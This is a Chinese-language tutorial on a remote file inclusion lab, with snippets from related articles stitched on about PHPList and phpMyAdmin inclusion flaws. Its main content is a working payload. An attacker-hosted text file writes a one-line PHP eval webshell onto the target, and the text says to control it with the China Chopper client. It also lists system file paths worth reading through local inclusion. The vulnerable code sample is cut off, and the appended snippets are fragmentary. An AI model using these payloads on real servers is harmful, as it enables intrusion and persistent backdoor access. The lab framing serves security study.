首先在自己的**(10.0.3.88)中建立乙個txt檔案(test.txt),內容為:
<?php
$payload = "<?php eval(\$_post['123']);?>";
$myfile = fopen("cforce.php", "w") or die("unable to open file!");
fwrite($myfile,$payload);
fclose($myfile);
?>
rfi.php是存在漏洞的網頁
<?php
if (isset($_get["file"]))
?>
在漏洞**的根目錄下,生成了乙個新的檔案
cforce.php
cforce.php
<?php eval($_post['123']);?>
這是乙個一句話木馬,可以通過中國菜刀去連線,獲得webshell。
實驗完畢,通過遠端檔案包含獲得乙個webshell
在這個漏洞環境下,只要檔案內容符合php語法規範,那麼任何副檔名都可以被php解析。
PHPList遠端檔案包含漏洞
影響版本 phplist 2.6.2 漏洞描述 phplist是一款由php編寫的時事通訊應用程式。phplist由於不充分過濾使用者提交的請求,遠端攻擊者可以利用這個漏洞包含遠端伺服器上的惡意php檔案,以web許可權執行。michiel dethmers secfoc kipu.co.uk se...
本地包含和遠端包含
本地包含 etc httpd conf httpd.conf etc rc.local 有時可以讀出來apache的路徑 usr local lib php.ini etc hosts.deny 定義禁止訪問本機的主機 etc bashrc bash shell 的系統全域性配置 etc group...
phpmyadmin 4 8 1 遠端檔案包含漏洞
phpmyadmin是一套開源的 基於web的mysql資料庫管理工具。其index.php中存在一處檔案包含邏輯,通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。git clone git cd vulhub phpmyadmin cve 2018 12613 docker compose up ...